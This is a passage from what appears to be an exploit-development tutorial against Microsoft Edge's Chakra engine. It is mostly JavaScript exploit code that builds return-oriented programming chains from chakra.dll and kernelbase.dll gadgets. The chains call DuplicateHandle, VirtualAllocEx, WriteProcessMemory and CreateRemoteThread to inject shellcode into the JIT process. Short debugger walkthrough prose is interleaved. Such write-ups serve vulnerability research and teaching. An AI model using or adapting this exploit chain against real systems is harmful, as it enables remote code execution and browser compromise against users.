write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Let’s now walk through this in the debugger. We again set a breakpoint on jmp rax until we reach our call to CreateRemoteThread. From here we can pt this function call to pause at the ret, and view our first gadgets for our new WriteProcessMemory ROP chain.

If we look at the above WriteProcessMemory ROP chain, we start off by actually preserving the value of the handle to the thread we just created in the .data section of kernelbase.dll (very similarly to what we did with preserving our VirtualAllocEx allocation). We can see this in action below (remember CreateRemoteThread’s return value is the handle value to the new thread. It is stored in RAX, so we can pull it directly from there):

After preserving the address, we begin with our first parameter - nSize. Since we are just writing a pointer value, we specify 8 bytes (while dealing with the pesky cmp r8d, [rax] instruction):

Our function call is now in the following state:

WriteProcessMemory(
	-
	-
	-
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

The next parameter we will target is hProcess. This time we are not writing remotely, and we can simply use -1, or 0xFFFFFFFFFFFFFFFF. This is the value returned by GetCurrentProcess to retrieve a handle to the current process. This tells WriteProcessMemory to perform this write process within the content process, where our VirtualProtect ROP chain is and where our exploit is currently executing. We can simply just write this value to the stack and pop it into RCX.

Our call is now in the current state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
	-
	-
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

Next up is lpBaseAddress parameter. This is where we want WriteProcessMemory to write whatever data we want to. In this case, this is the location in the VirtualProtect ROP chain in the .data section of chakra.dll.

Our call is now in the current state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	-
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

The next item to take care of is the lpBuffer. This memory address contains the contents we want to write to lpBaseAddress. Recall earlier that we stored our VirtualAllocEx allocation (our shellcode location in the remote process) into the .data section of kernelbase.dll. Since lpBuffer requires a pointer, we simply just need to place the .data address of our stored allocation into R8.

Our call is now in the following state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of our VirtualAllocEx allocation (where our shellcode resides in the JIT process at this point in the exploit)
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

The last parameter we need to write to the stack, so we will go ahead and load WriteProcessMemory into RAX and directly write our NULL value.

Here is our VirtualProtect ROP chain before (we are trying to update it an exploit runtime):

After (using pt to execute the call to WriteProcessMemory, which pauses execution on the ret):

As we can see, we successfully updated our ROP chain so that when the VirtualProtect ROP chain is eventually called, it is aware of where our shellcode is.

WriteProcessMemory ROP Chain (Round 3)

This ROP chain is identical to the above ROP chain, except for the fact we want to overwrite a placeholder for the “fake return address” after our eventual call to VirtualProtect. We want VirtualProtect, after it is called, to transfer execution to our shellcode. This can be seen in a snippet of our VirtualProtect ROP chain.

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
inc();

We need to reconcile this, just like we did in our last WriteProcessMemory call, where we dynamically updated the ROP chain. Again, we need to use another call to WriteProcessMemory to update this last location. This will ensure our eventual VirtualProtect ROP chain is good to go. We will omit these steps, as it is all documented above, but I will still provide the updated code below.

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
